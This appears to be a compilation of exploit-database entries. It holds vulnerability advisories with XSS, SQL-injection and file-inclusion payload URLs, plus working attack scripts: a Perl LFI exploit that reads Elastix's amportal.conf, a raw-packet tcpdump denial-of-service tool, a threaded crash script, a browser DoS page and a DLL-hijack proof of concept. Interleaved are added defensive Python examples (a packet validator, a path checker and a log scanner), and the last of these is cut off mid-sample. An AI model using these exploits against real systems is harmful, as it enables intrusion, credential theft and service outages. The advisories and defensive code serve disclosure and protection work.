
source: https://www.securityfocus.com/bid/55091/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.

Mozilla Firefox 14.01 is affected; prior versions may also be affected. 

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>
            
source: https://www.securityfocus.com/bid/55082/info

LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

LISTSERV 16 is vulnerable; other versions may also be affected. 

http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script> 
            
source: https://www.securityfocus.com/bid/54991/info

MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.

MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 
            
source: https://www.securityfocus.com/bid/54992/info

GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host are prone to a local file-include vulnerability because they fail to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

For GalaxyScripts Mini File Host:

http://www.example.com/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg

For DaddyScripts Daddy's File Host:

http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg 
            
source: https://www.securityfocus.com/bid/55062/info

The ShopperPress WordPress theme is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow an attacker to steal cookie-based authentication credentials, to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.

ShopperPress 2.7 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]-- 
            
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Software to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
 
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
 
}
else { 
print "\n[-] not successful\n";
	}
            
source: https://www.securityfocus.com/bid/54989/info

mIRC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);> 
            
source: https://www.securityfocus.com/bid/54985/info

Total Shop UK eCommerce CodeIgniter is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. 

Example 1 Request:
+-----------------
GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1
Host: www.example.com
Referer: http://www.example.com/about

---

Example 1 Response:
+------------------
--- SNIP ---
function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; 
            
Document Title:
===============
Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1543


Release Date:
=============
2015-07-20


Vulnerability Laboratory ID (VL-ID):
====================================
1543


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.

(Copy of the Product Homepage: https://www.airdroid.com/de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-05: Researcher Notification & Coordination (Hadji Samir)
2015-07-06: Vendor Notification (Security Team)
2015-07-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sand Studio
Product: AirDroid iOS Application (Android, Windows, MacOS & Web) 3.1.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SandStudio AirDroid (Windows, iOS and Android) mobile web-application.
The vulnerability allows remote attackers or low-privilege user accounts to inject malicious code into the application side of the affected mobile web-application.

The vulnerability is located in the send message module and the send message with attached file function. Remote attackers with a low-privilege user account are able to upload a file whose name 
contains malicious strings such as "><script>alert(1).txt. When the message arrives in the inbox, the malicious code executes and compromises the other target system/device user account.
The vulnerability is located on the application side and the request method used to inject is POST.

The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.9.
Exploitation of the application-side web vulnerability requires a low-privilege web-application user account and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirects to malicious 
sources and application-side manipulation of the affected or connected module context.

Request Method(s):
						[+] POST

Vulnerable Module(s):
						[+] Send Message

Vulnerable Parameter(s):
						[+] filename

Affected Module(s):
						[+] Message Inbox


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction (click).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
<span class="name">"><"><script>alert(document.cookie).txt< span="">[PERSISTENT INJECTED SCRIPT CODE]
    <span class="progress-rate">100%</span>
    <a class="attach-del-icon"></a>
</scrip...txt<></span>


--- PoC Session Logs [POST] ---
11:13:00.993[0ms][total 0ms] Status: pending[]
POST https://upload.airdroid.com/sms/attachment/?fn=%22%3E%3Cscript%3Ealert(document.cookie).txt&d=&after=0&rtype=0&origin=http%3A%2F%2Fweb.airdroid.com&country=DZ&fname=%22%3E%3Cscript%3Ealert(document.cookie).txt 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[upload.airdroid.com]
      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/octet-stream]
      Referer[http://web.airdroid.com/]
      Content-Length[5281]
      Origin[http://web.airdroid.com]
      Cookie[_SESSION=0b484eb230f27c004a7e990bace6175a416b58ed-%00_TS%3A1438769709%00; _ga=GA1.2.1046706455.1436177514; _gat=1; account_sid=c51d21b583ce76c04c8d4fa5a5c7496e; account_info=aW5mby5kaW1hbmV0QGdtYWlsLmNvbQ%3D%3D%2C63b971b729a756a3c1eb0fec6cccb736%2C9731220%2C59fd7af875fa5434a86e5397c79380d2]
   Post Data:
      POST_DATA[-PNG
	  
Note: We demonstrated the PoC using the web app, but the local app is also vulnerable to the same issue!


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the send message module with the attach file function.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the airdroid app is estimated as medium. (CVSS 3.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service
# Date: 7.18.2015
# Exploit Author: Luke Arntson arntsonl@gmail.com
# Vendor Homepage: http://www.tcpdump.org/
# Software Link: http://www.tcpdump.org/
# Version: 4.6.2, 4.5.1, 4.4.0
# Tested on: Lubuntu 14.04 64-bit
# CVE : CVE-2015-2153
 
# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.
 
import socket, sys
from struct import *
 
def checksum(msg):
    s = 0
    for i in range(0, len(msg), 2):
        w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
        s = s + w
    s = (s>>16) + (s & 0xffff);
    s = s + (s >> 16);
    s = ~s & 0xffff
    return s

if len(sys.argv) != 3:
    print "Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>"
    exit()

# fake the source and destination
source_ip = sys.argv[1]
dest_ip = sys.argv[2]
	
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
    print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
    sys.exit()
   
packet = ''

# ip header fields
ip_ihl = 5
ip_ver = 4
ip_tos = 0
ip_tot_len = 0  # kernel will fill the correct total length
ip_id = 54321   #Id of this packet
ip_frag_off = 0
ip_ttl = 255
ip_proto = socket.IPPROTO_TCP
ip_check = 0    # kernel will fill the correct checksum
ip_saddr = socket.inet_aton ( source_ip )   #Spoof the source ip address if you want to
ip_daddr = socket.inet_aton ( dest_ip )
 
ip_ihl_ver = (ip_ver << 4) + ip_ihl
 
ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)
 
# tcp header fields
tcp_source = 255   # source port
tcp_dest = 323   # destination port
tcp_seq = 454
tcp_ack_seq = 0
tcp_doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
tcp_fin = 0
tcp_syn = 1
tcp_rst = 0
tcp_psh = 0
tcp_ack = 0
tcp_urg = 0
tcp_window = socket.htons (5840)    #   maximum allowed window size
tcp_check = 0
tcp_urg_ptr = 0
 
tcp_offset_res = (tcp_doff << 4) + 0
tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)
 
tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window, tcp_check, tcp_urg_ptr)

# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.
# The RPKI pdu looks like the following
# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]
# by giving message length a long value, we cause the buffer to write into bad memory
error_pdu = '\x41' # fake version
error_pdu = error_pdu + '\x0A' # error type
error_pdu = error_pdu + '\x00\x01' # error number
error_pdu = error_pdu + '\x00\x00\x00\x08' # must be less than or equal to total packet length
error_pdu = error_pdu + '\x00\x00\x00\x00' # no encapsulated pdu
error_pdu = error_pdu + '\x7F\xFF\xFF\xFF' # overwrite out-of-bounds '\0', causing DoS
error_pdu = error_pdu + 'AAAA' # fake message

user_data = error_pdu

# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header) + len(user_data)
 
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header + user_data;
 
tcp_check = checksum(psh)

# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)
 
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header + user_data
 
#Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip , 0 ))    # put this in a loop if you want to flood the target
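The comment in the exploit above spells out the Error Report PDU layout and the length field it abuses. As an added example, not taken from the exploit, from tcpdump or from the CVE fix, the following Python parser reads that same layout while checking every length field against the bytes actually present, which is the check a decoder needs in order to refuse such a PDU instead of reading past its buffer. The function and constant names are mine, and the three sample PDUs are constructed inline (the first one byte-for-byte from the exploit's own comments).

```python
import struct

ERROR_REPORT = 0x0A  # PDU type of an Error Report PDU (RFC 6810)
HEADER_LEN = 8       # version(1) type(1) error_code(2) pdu_length(4)


class PduError(ValueError):
    """A length field in the PDU does not agree with the bytes actually present."""


def _read_length(buf, off, end, name):
    """Read a 4-byte big-endian length at `off` and require the field it
    describes to end at or before `end`; the value is never used before this."""
    if off + 4 > end:
        raise PduError("%s field runs past pdu_length" % name)
    (n,) = struct.unpack("!I", buf[off:off + 4])
    if off + 4 + n > end:
        raise PduError("%s=%d exceeds remaining %d bytes" % (name, n, end - off - 4))
    return n, off + 4


def parse_error_report(buf):
    """Parse one Error Report PDU from `buf`, validating every length."""
    if len(buf) < HEADER_LEN:
        raise PduError("truncated header: only %d bytes" % len(buf))
    version, pdu_type, error_code, pdu_length = struct.unpack("!BBHI", buf[:HEADER_LEN])
    if pdu_type != ERROR_REPORT:
        raise PduError("not an Error Report PDU: type 0x%02x" % pdu_type)
    # pdu_length counts the whole PDU, header included, so it must cover at
    # least the header and can never exceed the bytes we were handed.
    if pdu_length < HEADER_LEN or pdu_length > len(buf):
        raise PduError("pdu_length=%d outside buffer of %d bytes" % (pdu_length, len(buf)))
    end = pdu_length          # hard limit for every later slice
    off = HEADER_LEN
    encap_len, off = _read_length(buf, off, end, "encap_length")
    encap = buf[off:off + encap_len]
    off += encap_len
    text_len, off = _read_length(buf, off, end, "text_length")
    text = buf[off:off + text_len]
    off += text_len
    return {
        "version": version,
        "error_code": error_code,
        "pdu_length": pdu_length,
        "encapsulated_pdu": encap,
        "text": text,
        "trailing": end - off,
    }


def validate(buf):
    """Return None if the PDU parses cleanly, else the rejection reason."""
    try:
        parse_error_report(buf)
    except PduError as exc:
        return str(exc)
    return None


# Constructed sample PDUs (hex; bytes.fromhex ignores the spaces).
# The one the exploit above sends, byte for byte as its comments describe:
EXPLOIT_PDU = bytes.fromhex("41 0A 0001 00000008 00000000 7FFFFFFF 41414141")
# A well-formed report carrying the text "AAAA": pdu_length 0x14 = 20 bytes.
GOOD_PDU = bytes.fromhex("00 0A 0001 00000014 00000000 00000004 41414141")
# Correct pdu_length but an absurd text_length, the field the CVE is about.
OVERLONG_TEXT_PDU = bytes.fromhex("00 0A 0001 00000014 00000000 7FFFFFFF 41414141")

if __name__ == "__main__":
    for name, pdu in [("exploit", EXPLOIT_PDU), ("good", GOOD_PDU), ("overlong", OVERLONG_TEXT_PDU)]:
        print("%-9s -> %s" % (name, validate(pdu) or parse_error_report(pdu)))
```

`parse_error_report` raises `PduError` as soon as any length claims more bytes than remain before `pdu_length`; the exploit's PDU is already refused at the encapsulated-PDU length, because its `pdu_length` of 8 does not even cover its own length fields, and the variant with a correct `pdu_length` is refused at the text length. `validate` turns that into a reason string suitable for a log line.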
            
#!/usr/bin/perl -w
# Title : Image Transfer IOS - Remote Crash Proof Of Concept
# Affected Versions: All Version
# Tested on IOS 8.4 (12h143) / 2.0
# Itunes link : https://itunes.apple.com/us/app/image-transfer-photo-video/id588696602?mt=8
#
# EDB note: Might require to be run multiple times to cause DoS
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#


system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use threads;
use LWP::UserAgent;


print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";


$port=8080; #port
$host=$ARGV[0]; #host


sub check_app {   #thread sub
        my $ua = LWP::UserAgent->new();
        $ua = new LWP::UserAgent(agent => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5");
        $ua -> timeout(10);
        print "*";
        $ua->get("http://$host:$port/?__debugger__=yes&cmd=resource&f=debugger.js");
        return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}
            
# phpVibe < 4.20 Stored XSS

# Vendor Homepage: http://www.phpvibe.com
# Affected Versions: prior to 4.20

# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

This stored XSS vulnerability allows any logged-in user
to inject malicious code in the comments section,
e.g. "><body onLoad=confirm("XSS")>

The vulnerability exists because the user input is not properly sanitized,
which can lead to malicious code injection that will be executed in the
target's browser.

-- Proof of Concept --

1. The attacker posts a new comment which contains our payload:
"><body onLoad=confirm("XSS")>

2. The stored XSS can be triggered when any user visits the link of the
uploaded content

-- Solution --

The vendor has fixed the issue in the version 4.21
            
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows  XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: 	CVE-2015-0097

Original Advisory: https://technet.microsoft.com/library/security/ms15-022

Microsoft Word, Excel and PowerPoint 2007 contain a remote code execution vulnerability because it is possible 
to reference documents such as Works documents (.wps) as HTML. The application will process HTML and script code in the context 
of the Local Machine Zone of Internet Explorer, which leads to arbitrary code execution. 
By persuading users into opening e.g. a specially crafted .WPS, ".doc " or ".RTF " file (with a space at the end) 
it is possible to trigger the vulnerability and run arbitrary code in the context of the logged-on Windows user.

Exploit code here :

https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37657.zip
            
source: https://www.securityfocus.com/bid/55189/info

PHP Web Scripts Ad Manager Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Ad Manager Pro version 4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
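MindTouch DekiWiki, the two File Host scripts, Elastix and Ad Manager Pro above all fall to the same inputs: a `../` chain, a `%00` that truncated the file name in older PHP, or an outright URL for remote inclusion. As an added example that is not code from any of those products, here is a Python routine for mapping a download parameter onto a file inside a fixed directory; it decodes the value the way the web server would and rejects all three patterns before touching the filesystem. The function names, the extension allow-list and the sample inputs are mine.

```python
import os
import urllib.parse

# Extensions the download endpoint is allowed to serve (an assumption for this example).
ALLOWED_EXT = {".jpg", ".png", ".pdf"}


class UnsafePath(ValueError):
    """The requested name cannot be mapped to a file inside the allowed directory."""


def resolve_download(base_dir, requested, allowed_ext=ALLOWED_EXT):
    """Map a user-supplied download name onto an absolute path strictly inside base_dir.

    `requested` is the raw query-string value. It is percent-decoded here the way
    the web server decodes it before the application sees it, so "%00" becomes a
    real NUL byte and "..%2F" becomes "../"; every check runs on the decoded form.
    """
    name = urllib.parse.unquote(requested)
    # 1. A NUL byte never belongs in a file name. Older PHP stopped reading the
    #    path at the NUL, which is what the "win.ini%00.jpg" trick relied on.
    if "\x00" in name:
        raise UnsafePath("NUL byte in name")
    # 2. Only a bare file name is acceptable: no separators, no parent
    #    references, no drive letters and no URL schemes (remote inclusion).
    if name in ("", ".", "..") or "/" in name or "\\" in name or ":" in name:
        raise UnsafePath("path separator or drive/scheme in name: %r" % name)
    # 3. Allow-list the extension on the decoded name, not on the raw one.
    ext = os.path.splitext(name)[1].lower()
    if ext not in allowed_ext:
        raise UnsafePath("extension %r not allowed" % ext)
    # 4. Canonicalise and confirm containment anyway, so that a symlink inside
    #    base_dir or a future loosening of the checks above cannot escape it.
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, full]) != root:
        raise UnsafePath("resolved outside base directory")
    return full


def check(base_dir, requested):
    """Return None when the name is acceptable, else the reason it was rejected."""
    try:
        resolve_download(base_dir, requested)
    except UnsafePath as exc:
        return str(exc)
    return None


# Constructed sample inputs: the PoC values from the advisories above plus benign names.
SAMPLES = [
    "photo.jpg",
    "../../../../../../../../../../windows/win.ini%00.jpg",
    "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "http://www.example.com/shell.txt?",
    "shell.php",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-62s -> %s" % (s, check("/srv/files", s) or "ok"))
```

The order of the checks matters: the NUL test comes first because a NUL would otherwise hide behind a valid-looking `.jpg` extension, and the containment test at the end is deliberately redundant so that the routine stays safe even if someone later relaxes the bare-name rule.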
            
source: https://www.securityfocus.com/bid/55179/info

Adobe Pixel Bender Toolkit2 is prone to multiple vulnerabilities that allow attackers to execute arbitrary code.

An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

int exp(void);        /* forward declaration: exp() is defined below the export that calls it */

DllExport void hook_startup() { exp(); }

int exp()
{
  WinExec("calc", 0); /* PoC payload: launch the calculator to prove the DLL was loaded */
  exit(0);
  return 0;
}
            
source: https://www.securityfocus.com/bid/55175/info

The Monsters Editor for the WP Super Edit plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

http://www.example.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

http://www.example.com/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html 
            
source: https://www.securityfocus.com/bid/55174/info

The Rich Widget plugin for WordPress is prone to an arbitrary file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

http://www.example.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html 
            
source: https://www.securityfocus.com/bid/55172/info

KindEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

KindEditor versions 4.1.2 and 4.0.6 are vulnerable; other versions may also be affected. 

http://www.example.com/kindeditor/index.php?name=<pre><script>alert('XSS');</script>by ZSL!</pre> 
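The reflected and stored XSS entries above (LISTSERV, ShopperPress, mIRC, Total Shop UK, KindEditor) and the file-include entries earlier leave the same trace in a web server's access log: after percent-decoding, the request target contains a script tag or event handler, a traversal chain, a NUL byte, or a URL-valued parameter. As an added example that is not part of any of the advisories, the following Python scanner applies those signatures to Common Log Format lines; the rule set, the regular expressions and the six sample log lines (built from the advisories' PoC paths with documentation IP addresses) are constructed here.

```python
import re
import urllib.parse

# Detection rules applied to the percent-decoded request target. Names and
# patterns are this example's own, tuned to the PoC URLs in the advisories above.
RULES = [
    ("xss-tag", re.compile(r"<\s*(script|iframe|img|svg|body)\b", re.I)),
    ("xss-handler", re.compile(r"\bon(load|error|click|mouseover)\s*=", re.I)),
    ("lfi-traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("lfi-nul", re.compile("\x00")),
    ("rfi-url", re.compile(r"=\s*(https?|ftp)://", re.I)),
]

# Common Log Format: host ident user [time] "method target version" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def decode_target(target, rounds=3):
    """Percent-decode until the value stops changing (bounded), so a doubly
    encoded %253C is seen as '<' just like a single-encoded %3C; '+' becomes space."""
    cur = target
    for _ in range(rounds):
        nxt = urllib.parse.unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def scan_line(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, pat in RULES if pat.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
            "target": decoded, "rules": hits}


def scan(lines):
    """All findings for an iterable of log lines, in input order."""
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample log: documentation IP addresses, PoC paths from the advisories.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Aug/2012:10:01:02 +0000] "GET /SCRIPTS/WA.EXE?SHOWTPL=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5120
203.0.113.5 - - [22/Aug/2012:10:01:09 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
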